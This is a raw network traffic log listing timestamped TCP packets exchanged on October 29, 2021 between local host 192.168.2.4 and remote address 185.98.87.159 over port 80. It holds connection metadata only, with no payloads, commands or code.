Oct 29, 2021 20:50:02.453084946 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453099966 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453110933 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.453119040 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453176022 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453186035 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.453193903 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453202963 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.453237057 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.453376055 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453404903 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453421116 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453437090 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453463078 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.453496933 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.453614950 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454396009 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454422951 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454441071 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454456091 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454473972 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454480886 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.454493046 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454509974 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454528093 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.454555035 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.454785109 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454807997 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454823017 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454854012 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.454854012 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454890966 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454900026 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.454907894 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454924107 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454940081 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454946995 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.454981089 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.454987049 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.455009937 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455127954 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455178976 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.455182076 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455203056 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455218077 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455224991 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.455235958 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455252886 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455261946 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.455300093 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.455528975 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455550909 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455595970 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455614090 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455621958 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.455630064 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455647945 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.455650091 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.455693007 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.456058979 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456082106 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456096888 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456135035 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.456149101 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456186056 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456187963 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.456203938 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456599951 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456623077 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456639051 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456653118 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.456655025 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456674099 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456690073 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.456691027 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456737041 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.456773996 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456790924 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456805944 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.456844091 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457377911 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457405090 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457422972 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457439899 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457446098 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457457066 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457479000 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457484007 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457544088 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457545042 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457561970 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457580090 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457596064 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457614899 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457623005 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457632065 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457648993 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457751036 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457770109 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457784891 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457797050 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457802057 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457818985 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457824945 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457835913 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457853079 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457869053 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457870007 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457886934 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457896948 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457904100 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457920074 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457928896 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457937956 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457954884 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457969904 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.457987070 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.457987070 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458024979 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458030939 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458048105 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458053112 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458065987 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458098888 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458131075 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458148003 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458163977 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458177090 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458179951 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458199024 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458209991 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458214998 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458233118 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458249092 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458256006 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458264112 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458281994 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458287954 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458297968 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458312988 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458319902 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458347082 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458364964 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458380938 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458396912 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458412886 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458426952 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458429098 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458447933 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458473921 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458477020 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458493948 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458509922 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458533049 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458590984 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458720922 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458740950 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458758116 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458772898 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458789110 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458803892 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458806038 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.458853960 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.458872080 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.459213018 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459238052 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459253073 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459270954 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459287882 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459302902 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459321976 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.459373951 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.459542036 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459559917 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459575891 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459594965 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459610939 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459628105 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459634066 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.459642887 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459659100 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.459683895 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.459712982 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.461234093 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.461983919 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.505233049 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505265951 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505279064 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505392075 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.505590916 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505609989 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505626917 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505642891 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505655050 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.505661011 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505677938 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.505686998 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.505731106 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.506323099 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506340981 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506386042 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506402969 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506412983 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.506432056 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506449938 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506452084 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.506467104 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506483078 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506494045 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.506500959 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506519079 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506521940 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.506536007 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506551981 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506555080 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.506586075 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.506591082 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506678104 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506695032 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506710052 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.506731033 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.506767035 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.507833004 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.507853985 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.507924080 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.507925987 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.507944107 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.507960081 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.507970095 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.507976055 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508008003 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.508063078 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508080006 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508126020 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.508245945 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508296967 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.508353949 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508416891 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508435011 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508450985 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508469105 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508486032 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.508500099 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.508590937 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508636951 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.508788109 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508805037 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508821011 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508837938 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508874893 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.508882999 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.508897066 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.509057999 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509076118 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509093046 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509109020 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509118080 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.509120941 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509134054 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509151936 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509164095 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509175062 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509177923 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.509182930 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.509188890 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509207010 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.509253025 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.509691954 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509708881 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509726048 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509742975 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509766102 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509771109 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.509778976 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.509809017 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.509829044 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510052919 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510091066 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510107994 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510123968 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510140896 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510150909 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510160923 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510178089 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510191917 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510210037 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510210991 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510230064 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510261059 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510279894 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510713100 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510746956 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510763884 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510795116 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510813951 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510816097 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510833979 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510854959 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510864019 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510871887 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510890007 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510902882 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510910988 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510914087 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510927916 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.510957003 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.510977030 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.511086941 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511113882 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511131048 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511194944 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.511200905 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511219025 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511236906 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511254072 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.511370897 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.511451960 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511470079 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511485100 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511516094 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511526108 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.511534929 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511553049 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511562109 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.511609077 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.511960983 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.511986971 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.512002945 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.512018919 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.512034893 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.512042046 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.512047052 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.512075901 CEST	49814	80	192.168.2.4	185.98.87.159
